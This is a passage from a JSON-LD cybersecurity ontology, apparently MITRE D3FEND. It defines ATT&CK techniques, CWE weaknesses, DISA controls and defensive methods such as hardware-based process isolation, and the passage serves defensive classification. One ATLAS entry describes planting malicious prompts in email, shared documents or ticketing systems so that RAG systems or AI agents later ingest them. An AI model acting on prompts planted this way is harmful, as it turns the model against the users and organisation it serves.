      "d3f:definition": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. (Citation: The MITRE Corporation)",
      "rdfs:label": "Exploitation for Privilege Escalation - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSPrivilegeEscalationTechnique"
      },
      "skos:prefLabel": "Exploitation for Privilege Escalation"
    },
    {
      "@id": "d3f:DS0027",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A computer program that operates or controls a particular type of device that is attached to a computer. Provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used",
      "rdfs:comment": "This data source captures events relating to hardware drivers and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Driver (ATT&CK DS)"
    },
    {
      "@id": "d3f:CCI-000018_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically audits account creation actions.",
      "d3f:exactly": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000018"
    },
    {
      "@id": "d3f:Hardware-basedProcessIsolation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Hardware-basedProcessIsolation"
      ],
      "d3f:d3fend-id": "D3-HBPI",
      "d3f:definition": "Preventing one process from writing to the memory space of another process through hardware based address manager implementations.",
      "d3f:isolates": {
        "@id": "d3f:Process"
      },
      "d3f:kb-article": "## How it works\nProcess isolation, in this context, is address space separation controlled by a security function that limits the communication between processes so that one process cannot directly modify the executing code of another process. For example with virtual address space:\n\n* Process A address space is different from process B address space, which prevents process A from writing to process B\n\nHardware process isolation is commonly implemented through Direct Memory Access (DMA) which collaborates with a Memory Management Unit (MMU), or Input-Output Memory Management Unit (IOMMU). These hardware controls are deployed directly on processors to aid hosts or enclaves in process isolation.\n\n* DMA - Direct memory access allows memory access to occur independently of the program currently run by the microprocessor. DMA allows for I/O devices to directly read from and write to memory, or it can be used to efficiently copy blocks of memory. During DMA transfers, the microprocessor can execute an unrelated program.\n* MMU - A memory management unit acts as an access control and is responsible for performing the translation of virtual memory addresses to physical memory addresses. The MMU allocates each process its own virtual memory space.\n* IOMMU - An input-output memory management unit is used to allocate each I/O device its own virtual address space to the underlying physical addresses. IOMMU allows devices that do not support long memory addresses to address the entire memory space.\n\n## Considerations\n* Private hosts may be vulnerable to DMA attack if they have a PCI or PCI Express port that connects attached devices directly to physical address space.\n\n## Implementations:\n * Intel Virtualization Technology for Directed I/O (Intel VT-d)\n * Firecracker",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-VirtualizedProcessIsolation_AdvancedMicroDevicesInc"
        },
        {
          "@id": "d3f:Reference-ApproachesForSecuringAnInternetEndpointUsingFine-grainedOperatingSystemVirtualization_Bromium,Inc."
        },
        {
          "@id": "d3f:Reference-IsolationOfApplicationsWithinAVirtualMachine_Bromium,Inc."
        }
      ],
      "d3f:restricts": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:synonym": "Virtualization",
      "rdfs:label": "Hardware-based Process Isolation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "_:Nbfa8c4d6f7c24f78b2ffd927f2f83c40"
        },
        {
          "@id": "_:N3561d9337acc4920aacf6d277bc37837"
        }
      ]
    },
    {
      "@id": "_:Nbfa8c4d6f7c24f78b2ffd927f2f83c40",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "_:N3561d9337acc4920aacf6d277bc37837",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:SSHConnectionCloseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating the termination of an SSH connection, signaling the end of a secure session.",
      "rdfs:label": "SSH Connection Close Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionCloseEvent"
        },
        {
          "@id": "d3f:SSHEvent"
        },
        {
          "@id": "_:Nf14703fa70a443cdb51b9694997df5d6"
        }
      ]
    },
    {
      "@id": "_:Nf14703fa70a443cdb51b9694997df5d6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SSHConnectionOpenEvent"
      }
    },
    {
      "@id": "d3f:CCI-002397_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, in conjunction with a remote device, prevents the device from simultaneously establishing non-remote connections with the system and communicating via some other connection to resources in external networks.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002397"
    },
    {
      "@id": "d3f:T1419",
      "@type": "owl:Class",
      "d3f:attack-id": "T1419",
      "d3f:definition": "On Android, device type information is accessible to apps through the android.os.Build class (Citation: Android-Build). Device information could be used to target privilege escalation exploits.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by",
      "rdfs:label": "Device Type Discovery - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "Device Type Discovery"
    },
    {
      "@id": "d3f:GNSSReceiver",
      "@type": "owl:Class",
      "d3f:definition": "A GNSS (Global Navigation Satellite System) receiver is an electronic device that picks up signals from one or more satellite constellations (like GPS, GLONASS, Galileo, BeiDou) to calculate precise location, velocity, and time.",
      "rdfs:label": "GNSS Receiver",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Satellite_navigation"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Receiver"
      }
    },
    {
      "@id": "d3f:GraphicsCardFirmware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Firmware that is installed on computer graphics card.",
      "rdfs:label": "Graphics Card Firmware",
      "rdfs:seeAlso": {
        "@id": "d3f:Firmware"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PeripheralFirmware"
      },
      "skos:altLabel": "Video Card Firmware"
    },
    {
      "@id": "d3f:BitmapImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A graphical image whose data is stored in a grid format.",
      "rdfs:label": "Bitmap Image",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalImage"
      }
    },
    {
      "@id": "d3f:Reference-DistributedMeta-informationQueryInANetwork_Bit9Inc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20070028302A1/en?oq=US-2007028302-A1"
      },
      "d3f:kb-abstract": "A security system provides a defense from known and unknown viruses, worms, spyware, hackers, and social engineering attacks. The system can implement centralized policies that allow an administrator to approve, block, quarantine, and log file activities. A server associated with a number of hosts can provide a query for host computers to access security-related meta-information in local host stores. The query is pulled from the server by the hosts. The results of the distributed host query are stored and merged on the server, and exported for display, reports, or security response.",
      "d3f:kb-author": "Todd Brennan; John Hanratty",
      "d3f:kb-mitre-analysis": "Provides a mechanism to detect, monitor, locate, and control files installed on host computers. Each host has a host agent that analyzes file system activity and takes action based on policies configured on a server. The policies identify whether to block, log, allow, or quarantine actions such as file accesses and execution of executables. Examples of policies include:\n\n* Block/log execution of new executables and detached scripts (e.g., .exe or .bat)\n* Block/log reading/execution of new embedded content (e.g., macros in .doc)\n* Block/log installation/modification of Web content (alteration of content in .html or .cgi files)\n* Block/log execution of new files in an administratively defined 'class'; e.g., an administrator might want to block screen savers .scr, but not the entire class of executables .exe, .dll, .sys, etc . . .",
      "d3f:kb-organization": "Bit 9 Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:kb-reference-title": "Distributed meta-information query in a network",
      "rdfs:label": "Reference - Distributed meta-information query in a network - Bit 9 Inc"
    },
    {
      "@id": "d3f:T1078.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1078.001",
      "d3f:definition": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)",
      "d3f:uses": {
        "@id": "d3f:DefaultUserAccount"
      },
      "rdfs:label": "Default Accounts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1078"
        },
        {
          "@id": "_:N6eb25da1e9f3445687d2dce7ffeb5041"
        }
      ]
    },
    {
      "@id": "_:N6eb25da1e9f3445687d2dce7ffeb5041",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefaultUserAccount"
      }
    },
    {
      "@id": "d3f:RestoreUserAccountAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreUserAccountAccess"
      ],
      "d3f:d3fend-id": "D3-RUAA",
      "d3f:definition": "Restoring a user account's access to resources.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Restore User Account Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreAccess"
        },
        {
          "@id": "_:N0261c2219a494a7fac80eb3a56685412"
        }
      ]
    },
    {
      "@id": "_:N0261c2219a494a7fac80eb3a56685412",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CCI-000163_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects audit information from unauthorized modification.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-22T00:00:00"
      },
      "rdfs:label": "CCI-000163"
    },
    {
      "@id": "d3f:T1098.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1098.005",
      "d3f:definition": "Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.",
      "rdfs:label": "Device Registration",
      "rdfs:subClassOf": {
        "@id": "d3f:T1098"
      }
    },
    {
      "@id": "d3f:T1195.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1195.002",
      "d3f:definition": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.",
      "d3f:modifies": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Compromise Software Supply Chain",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1195"
        },
        {
          "@id": "_:Nb92b98b72cf548eb959c14370b744a97"
        }
      ]
    },
    {
      "@id": "_:Nb92b98b72cf548eb959c14370b744a97",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:T1053",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1053",
      "d3f:definition": "The sub-techniques of this are specific software implementations of scheduling capabilities.",
      "d3f:executes": {
        "@id": "d3f:ScheduledJob"
      },
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:modifies": {
        "@id": "d3f:JobSchedule"
      },
      "rdfs:label": "Scheduled Task/Job",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        },
        {
          "@id": "_:N340d58ac476248a982f10c4471bcde4f"
        },
        {
          "@id": "_:N89b4574e8daf406f9e6c946dfee01d4b"
        },
        {
          "@id": "_:N762e48fdc73b457ca89d331442cf662b"
        }
      ]
    },
    {
      "@id": "_:N340d58ac476248a982f10c4471bcde4f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJob"
      }
    },
    {
      "@id": "_:N89b4574e8daf406f9e6c946dfee01d4b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N762e48fdc73b457ca89d331442cf662b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedule"
      }
    },
    {
      "@id": "d3f:TA0100",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Collection - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Collection"
    },
    {
      "@id": "d3f:deceives",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "deceives",
      "rdfs:subPropertyOf": {
        "@id": "d3f:counters"
      }
    },
    {
      "@id": "d3f:ST0002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to establish resources they can use to support operations.",
      "d3f:display-order": 2,
      "rdfs:label": "Resource Development - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Resource Development"
    },
    {
      "@id": "d3f:Linux_Exit",
      "@type": "owl:Class",
      "d3f:definition": "Terminate the calling process.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/exit.2.html"
      },
      "rdfs:label": "Linux _Exit",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPITerminateProcess"
      }
    },
    {
      "@id": "d3f:CWE-617",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-617",
      "d3f:definition": "The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary.",
      "d3f:synonym": "assertion failure",
      "rdfs:label": "Reachable Assertion",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-670"
      }
    },
    {
      "@id": "d3f:CWE-561",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-561",
      "d3f:definition": "The product contains dead code, which can never be executed.",
      "rdfs:label": "Dead Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1164"
      }
    },
    {
      "@id": "d3f:T1538",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:CloudConfiguration"
      },
      "d3f:attack-id": "T1538",
      "d3f:definition": "An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)",
      "rdfs:label": "Cloud Service Dashboard",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N98c2170b708b44c5a4709460427860f2"
        }
      ]
    },
    {
      "@id": "_:N98c2170b708b44c5a4709460427860f2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:T1201",
      "@type": "owl:Class",
      "d3f:attack-id": "T1201",
      "d3f:definition": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).",
      "rdfs:label": "Password Policy Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:CCI-002617_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization removes organization-defined software components (e.g., previous versions) after updated versions have been installed.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002617"
    },
    {
      "@id": "d3f:CloudInstanceMetadata",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Cloud instance metadata is configuration information on the instance and users of the instance.  This includes such information as security groups, public ip addresses, and private addresses, public keys configured, and event rotating security keys. User data can contain initialization scripts, variables, passwords, and more.",
      "rdfs:label": "Cloud Instance Metadata",
      "rdfs:seeAlso": {
        "@id": "https://isc.sans.edu/forums/diary/Cloud+Metadata+Urls/22046"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:T1556.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1556.007",
      "d3f:definition": "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.",
      "rdfs:label": "Hybrid Identity",
      "rdfs:subClassOf": {
        "@id": "d3f:T1556"
      }
    },
    {
      "@id": "d3f:CCI-002533_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains a separate execution domain for each thread in organization-defined multi-threaded processing.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Kernel-basedProcessIsolation"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002533"
    },
    {
      "@id": "d3f:Authentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A request-response comprising a user credential presentation to a system and a verification response.",
      "rdfs:label": "Authentication",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Authentication"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00155053-n"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveAction"
        },
        {
          "@id": "_:N2906d17b0f79460ca5ac436f14233798"
        },
        {
          "@id": "_:N89ca761319904f10bf07bb77dd87ef12"
        },
        {
          "@id": "_:N498b62668b7040f1b4034bfc73b88a1e"
        }
      ]
    },
    {
      "@id": "_:N2906d17b0f79460ca5ac436f14233798",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:User"
      }
    },
    {
      "@id": "_:N89ca761319904f10bf07bb77dd87ef12",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "_:N498b62668b7040f1b4034bfc73b88a1e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:originates-from"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLocation"
      }
    },
    {
      "@id": "d3f:SharedResourceAccessFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Resource"
      },
      "d3f:definition": "A function which access a shared resource.",
      "rdfs:label": "Shared Resource Access Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N70538cd48cf243ffacd3fb870df76997"
        }
      ]
    },
    {
      "@id": "_:N70538cd48cf243ffacd3fb870df76997",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:modifies",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x modifies y: A technique or agent x causes a digital object y to change; become different; or undertake a transformation.  Afterwards, the data or state held by a digital object is changed.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00126072-v"
      },
      "rdfs:label": "modifies",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:accesses"
        },
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-modify"
        }
      ],
      "skos:altLabel": "alters"
    },
    {
      "@id": "d3f:T1478",
      "@type": "owl:Class",
      "d3f:attack-id": "T1478",
      "d3f:definition": "An adversary could attempt to install insecure or malicious configuration settings on the mobile device, through means such as phishing emails or text messages either directly containing the configuration settings as an attachment, or containing a web link to the configuration settings. The device user may be tricked into installing the configuration settings through social engineering techniques (Citation: Symantec-iOSProfile).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1632.001",
      "rdfs:label": "Install Insecure or Malicious Configuration - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1632.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileInitialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Install Insecure or Malicious Configuration"
    },
    {
      "@id": "d3f:AML.T0093",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0093",
      "d3f:definition": "An adversary may introduce malicious prompts into the victim's system via a public-facing application with the intention of it being ingested by an AI at some point in the future and ultimately having a downstream effect. This may occur when a data source is indexed by a retrieval augmented generation (RAG) system, when a rule triggers an action by an AI agent, or when a user utilizes a large language model (LLM) to interact with the malicious content. The malicious prompts may persist on the victim system for an extended period and could affect multiple users and various AI tools within the victim organization.\n\nAny public-facing application that accepts text input could be a target. This includes email, shared document systems like OneDrive or Google Drive, and service desks or ticketing systems like Jira.\n\nAdversaries may perform [Reconnaissance](/tactics/AML.TA0002) to identify public facing applications that are likely monitored by an AI agent or are likely to be indexed by a RAG. They may perform [Discover AI Agent Configuration](/techniques/AML.T0084) to refine their targeting.",
      "rdfs:label": "Prompt Infiltration via Public-Facing Application - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0093"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASInitialAccessTechnique"
        },
        {
          "@id": "d3f:ATLASPersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Prompt Infiltration via Public-Facing Application"
    },
    {
      "@id": "d3f:MicrosoftWordDOTFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOT File"
    },
    {
      "@id": "d3f:VolumeSnapshot",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A volume snapshot is a point-in-time copy of a storage volume.",
      "rdfs:isDefinedBy": {
        "@id": "https://kubernetes-csi.github.io/docs/snapshot-restore-feature.html"
      },
      "rdfs:label": "Volume Snapshot",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Shadow_Copy"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:StorageSnapshot"
      }
    },
    {
      "@id": "d3f:CCI-001749_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents the installation of organization-defined software components without verification the software component has been digitally signed using a certificate that is recognized and approved by the organization.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-02-28T00:00:00"
      },
      "rdfs:label": "CCI-001749"
    },
    {
      "@id": "d3f:runs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x runs y: To carry out a process or program y, as on a computer or a machine x; where y may be a large software assembly or a specific module or instruction.  Examples: \"run a new program on the Mac\"; \"the computer runs the application software\".",
      "rdfs:label": "runs",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02569242-v"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-run"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000015_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:AccountLocking"
        },
        {
          "@id": "d3f:DomainAccountMonitoring"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated mechanisms to support the information system account management functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000015"
    },
    {
      "@id": "d3f:JavaArchive",
      "@type": "owl:Class",
      "d3f:definition": "A JAR (Java ARchive) is a package file format typically used to aggregate many Java class files and associated metadata and resources (text, images, etc.) into one file for distribution.",
      "rdfs:label": "Java Archive",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/JAR_(file_format)"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ArchiveFile"
        },
        {
          "@id": "d3f:SoftwarePackage"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1274",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1274",
      "d3f:definition": "The product conducts a secure-boot process that transfers bootloader code from Non-Volatile Memory (NVM) into Volatile Memory (VM), but it does not have sufficient access control or other protections for the Volatile Memory.",
      "rdfs:label": "Improper Access Control for Volatile Memory Containing Boot Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:Reference-FileSecurityUsingFileFormatValidation_OPSWATInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patentimages.storage.googleapis.com/ba/10/83/968a6345eee505/US20200104494A1.pdf"
      },
      "d3f:kb-abstract": "A method for securely validating the file format type including receiving a file having a file format type, a header and a content block. The header has a header block with a description representing attributes of the actual content in the file . The content block has leading bytes representing attributes of the actual content, and actual content. Data is parsed from the description of the header block, the leading bytes and the actual content. Data from the description is compared to the data from the leading bytes, data from the leading bytes is compared to the data from the actual content, and data from the description is compared to the data from the actual content. The file format type is validated and trustable when the data from the description, the data from the leading bytes and the data from the actual content are consistent with one another.",
      "d3f:kb-author": "Benjamin Czarny, Yiyi Miao, Jianpeng Mo",
      "d3f:kb-organization": "OPSWAT, Inc.",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ContentValidation"
        },
        {
          "@id": "d3f:FileFormatVerification"
        }
      ],
      "d3f:kb-reference-title": "File Security Using FIle Format Validation",
      "rdfs:label": "Reference - File Security Using File Format Validation - OPSWAT Inc"
    },
    {
      "@id": "d3f:CCI-001166_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DynamicAnalysis"
        },
        {
          "@id": "d3f:EmulatedFileAnalysis"
        },
        {
          "@id": "d3f:FileContentRules"
        }
      ],
      "d3f:contributor": {
